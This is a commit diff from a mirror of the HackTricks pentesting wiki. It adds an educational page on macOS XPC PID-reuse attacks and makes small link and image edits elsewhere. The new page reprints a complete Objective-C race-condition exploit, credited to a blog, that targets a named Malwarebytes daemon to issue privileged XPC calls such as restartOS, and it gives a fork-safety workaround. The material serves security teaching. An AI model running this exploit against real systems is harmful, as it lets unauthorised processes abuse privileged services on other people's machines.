mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GITBOOK-3943: change request with no subject merged in GitBook
This commit is contained in:
parent
63070ae71b
commit
149284a747
9 changed files with 176 additions and 11 deletions
BIN
.gitbook/assets/image (4) (1) (4).png
Normal file
BIN
.gitbook/assets/image (4) (1) (4).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 329 KiB |
Binary file not shown.
Before Width: | Height: | Size: 329 KiB After Width: | Height: | Size: 45 KiB |
Binary file not shown.
Before Width: | Height: | Size: 45 KiB After Width: | Height: | Size: 96 KiB |
|
@ -144,6 +144,7 @@
|
|||
* [macOS Bundles](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-bundles.md)
|
||||
* [macOS IPC - Inter Process Communication](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md)
|
||||
* [macOS XPC Connecting Process Check](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md)
|
||||
* [macOS PID Reuse](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md)
|
||||
* [macOS XPC Authorization](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md)
|
||||
* [macOS Function Hooking](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md)
|
||||
* [Universal binaries & Mach-O Format](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/universal-binaries-and-mach-o-format.md)
|
||||
|
|
|
@ -0,0 +1,166 @@
|
|||
# macOS PID Reuse
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## PID Reuse
|
||||
|
||||
When a macOS **XPC service** is checking the called process based on the **PID** and not on the **audit token**, it's vulnerable to PID reuse attack. This attack is based on a **race condition** where an **exploit** is going to **send messages to the XPC** service **abusing** the functionality and just **after** that, executing **`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ)`** with the **allowed** binary.
|
||||
|
||||
This function will make the **allowed binary own the PID** but the **malicious XPC message would have been sent** just before. So, if the **XPC** service **use** the **PID** to **authenticate** the sender and checks it **AFTER** the execution of **`posix_spawn`**, it will think it comes from an **authorized** process.
|
||||
|
||||
|
||||
|
||||
### Exploit example
|
||||
|
||||
If you find the function **`shouldAcceptNewConnection`** or a function called by it **calling** **`processIdentifier`** and not calling **`auditToken`**. It highly probable means that it's v**erifying the process PID** and not the audit token.\
|
||||
Like for example in this image (taken from the reference):
|
||||
|
||||
<figure><img src="../../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit:
|
||||
|
||||
* One that **generates several forks**
|
||||
* **Each fork** will **send** the **payload** to the XPC service while executing **`posix_spawn`** just after sending the message.
|
||||
|
||||
{% hint style="danger" %}
|
||||
For the exploit to work it's important to export export OBJC\_DISABLE\_INITIALIZE\_FORK\_SAFETY=YES or to put in th exploit:
|
||||
|
||||
```objectivec
|
||||
asm(".section __DATA,__objc_fork_ok\n"
|
||||
"empty:\n"
|
||||
".no_dead_strip empty\n");
|
||||
```
|
||||
{% endhint %}
|
||||
|
||||
```objectivec
|
||||
// from https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/
|
||||
|
||||
#import <Foundation/Foundation.h>
|
||||
#include <spawn.h>
|
||||
#include <sys/stat.h>
|
||||
|
||||
#define RACE_COUNT 32
|
||||
#define MACH_SERVICE @"com.malwarebytes.mbam.rtprotection.daemon"
|
||||
#define BINARY "/Library/Application Support/Malwarebytes/MBAM/Engine.bundle/Contents/PlugIns/RTProtectionDaemon.app/Contents/MacOS/RTProtectionDaemon"
|
||||
|
||||
// allow fork() between exec()
|
||||
asm(".section __DATA,__objc_fork_ok\n"
|
||||
"empty:\n"
|
||||
".no_dead_strip empty\n");
|
||||
|
||||
extern char **environ;
|
||||
|
||||
// defining necessary protocols
|
||||
@protocol ProtectionService
|
||||
- (void)startDatabaseUpdate;
|
||||
- (void)restoreApplicationLauncherWithCompletion:(void (^)(BOOL))arg1;
|
||||
- (void)uninstallProduct;
|
||||
- (void)installProductUpdate;
|
||||
- (void)startProductUpdateWith:(NSUUID *)arg1 forceInstall:(BOOL)arg2;
|
||||
- (void)buildPurchaseSiteURLWithCompletion:(void (^)(long long, NSString *))arg1;
|
||||
- (void)triggerLicenseRelatedChecks;
|
||||
- (void)buildRenewalLinkWith:(NSUUID *)arg1 completion:(void (^)(long long, NSString *))arg2;
|
||||
- (void)cancelTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
|
||||
- (void)startTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
|
||||
- (void)unredeemLicenseKeyWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
|
||||
- (void)applyLicenseWith:(NSUUID *)arg1 key:(NSString *)arg2 completion:(void (^)(long long))arg3;
|
||||
- (void)controlProtectionWithRawFeatures:(long long)arg1 rawOperation:(long long)arg2;
|
||||
- (void)restartOS;
|
||||
- (void)resumeScanJob;
|
||||
- (void)pauseScanJob;
|
||||
- (void)stopScanJob;
|
||||
- (void)startScanJob;
|
||||
- (void)disposeOperationBy:(NSUUID *)arg1;
|
||||
- (void)subscribeTo:(long long)arg1;
|
||||
- (void)pingWithTag:(NSUUID *)arg1 completion:(void (^)(NSUUID *, long long))arg2;
|
||||
@end
|
||||
|
||||
void child() {
|
||||
|
||||
// send the XPC messages
|
||||
NSXPCInterface *remoteInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ProtectionService)];
|
||||
NSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:MACH_SERVICE options:NSXPCConnectionPrivileged];
|
||||
xpcConnection.remoteObjectInterface = remoteInterface;
|
||||
|
||||
[xpcConnection resume];
|
||||
[xpcConnection.remoteObjectProxy restartOS];
|
||||
|
||||
char target_binary[] = BINARY;
|
||||
char *target_argv[] = {target_binary, NULL};
|
||||
posix_spawnattr_t attr;
|
||||
posix_spawnattr_init(&attr);
|
||||
short flags;
|
||||
posix_spawnattr_getflags(&attr, &flags);
|
||||
flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);
|
||||
posix_spawnattr_setflags(&attr, flags);
|
||||
posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);
|
||||
}
|
||||
|
||||
bool create_nstasks() {
|
||||
|
||||
NSString *exec = [[NSBundle mainBundle] executablePath];
|
||||
NSTask *processes[RACE_COUNT];
|
||||
|
||||
for (int i = 0; i < RACE_COUNT; i++) {
|
||||
processes[i] = [NSTask launchedTaskWithLaunchPath:exec arguments:@[ @"imanstask" ]];
|
||||
}
|
||||
|
||||
int i = 0;
|
||||
struct timespec ts = {
|
||||
.tv_sec = 0,
|
||||
.tv_nsec = 500 * 1000000,
|
||||
};
|
||||
|
||||
nanosleep(&ts, NULL);
|
||||
if (++i > 4) {
|
||||
for (int i = 0; i < RACE_COUNT; i++) {
|
||||
[processes[i] terminate];
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
int main(int argc, const char * argv[]) {
|
||||
|
||||
if(argc > 1) {
|
||||
// called from the NSTasks
|
||||
child();
|
||||
|
||||
} else {
|
||||
NSLog(@"Starting the race");
|
||||
create_nstasks();
|
||||
}
|
||||
|
||||
return 0;
|
||||
}obj
|
||||
```
|
||||
|
||||
## Refereces
|
||||
|
||||
* [https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/](https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/)
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
|
@ -194,15 +194,7 @@ This means that at the end of this process, the permissions declared inside `com
|
|||
|
||||
There are different scopes to indicate who can access a right. Some of them are defined in [AuthorizationDB.h](https://github.com/aosm/Security/blob/master/Security/libsecurity\_authorization/lib/AuthorizationDB.h) (you can find [all of them in here](https://www.dssw.co.uk/reference/authorization-rights/)), but as summary:
|
||||
|
||||
| Name | Value | Description |
|
||||
| ------------------------------------------- | -------------------------- | ---------------------------------------------------------------------- |
|
||||
| kAuthorizationRuleClassAllow | allow | Anyone |
|
||||
| kAuthorizationRuleClassDeny | deny | Nobody |
|
||||
| kAuthorizationRuleIsAdmin | is-admin | Current user needs to be an admin (inside admin group) |
|
||||
| kAuthorizationRuleAuthenticateAsSessionUser | authenticate-session-owner | Ask user to authenticate. |
|
||||
| kAuthorizationRuleAuthenticateAsAdmin | authenticate-admin | Ask user to authenticate. He needs to be an admin (inside admin group) |
|
||||
| kAuthorizationRightRule | rule | Specify rules |
|
||||
| kAuthorizationComment | comment | Specify some extra comments on the right |
|
||||
<table><thead><tr><th width="284.3333333333333">Name</th><th width="165">Value</th><th>Description</th></tr></thead><tbody><tr><td>kAuthorizationRuleClassAllow</td><td>allow</td><td>Anyone</td></tr><tr><td>kAuthorizationRuleClassDeny</td><td>deny</td><td>Nobody</td></tr><tr><td>kAuthorizationRuleIsAdmin</td><td>is-admin</td><td>Current user needs to be an admin (inside admin group)</td></tr><tr><td>kAuthorizationRuleAuthenticateAsSessionUser</td><td>authenticate-session-owner</td><td>Ask user to authenticate.</td></tr><tr><td>kAuthorizationRuleAuthenticateAsAdmin</td><td>authenticate-admin</td><td>Ask user to authenticate. He needs to be an admin (inside admin group)</td></tr><tr><td>kAuthorizationRightRule</td><td>rule</td><td>Specify rules</td></tr><tr><td>kAuthorizationComment</td><td>comment</td><td>Specify some extra comments on the right</td></tr></tbody></table>
|
||||
|
||||
### Rights Verification
|
||||
|
||||
|
|
|
@ -27,6 +27,12 @@ When a connection is stablished to an XPC service, the server will check if the
|
|||
6. The **verification** must be **based** on the connecting **client’s audit token** **instead** of its process ID (**PID**) since the former prevents PID reuse attacks.
|
||||
* Developers rarely use the audit token API call since it’s **private**, so Apple could **change** at any time. Additionally, private API usage is not allowed in Mac App Store apps.
|
||||
|
||||
For more information about the PID reuse attack check:
|
||||
|
||||
{% content-ref url="macos-pid-reuse.md" %}
|
||||
[macos-pid-reuse.md](macos-pid-reuse.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Code Examples
|
||||
|
||||
The server will implement this **verification** in a function called **`shouldAcceptNewConnection`**.
|
||||
|
|
|
@ -127,7 +127,7 @@ MH_MAGIC_64 ARM64 E USR00 EXECUTE 19 1728 NOUNDEFS DY
|
|||
|
||||
Or using [Mach-O View](https://sourceforge.net/projects/machoview/):
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../../.gitbook/assets/image (4) (1) (4).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
## **Mach-O Load commands**
|
||||
|
||||
|
|
|
@ -27,7 +27,7 @@ DOM Invader integrates a tab within the browser's DevTools panel enabling the fo
|
|||
|
||||
In the Burp's builtin browser go to the **Burp extension** and enable it:
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
|
||||
|
||||
|
|
Loading…
Reference in a new issue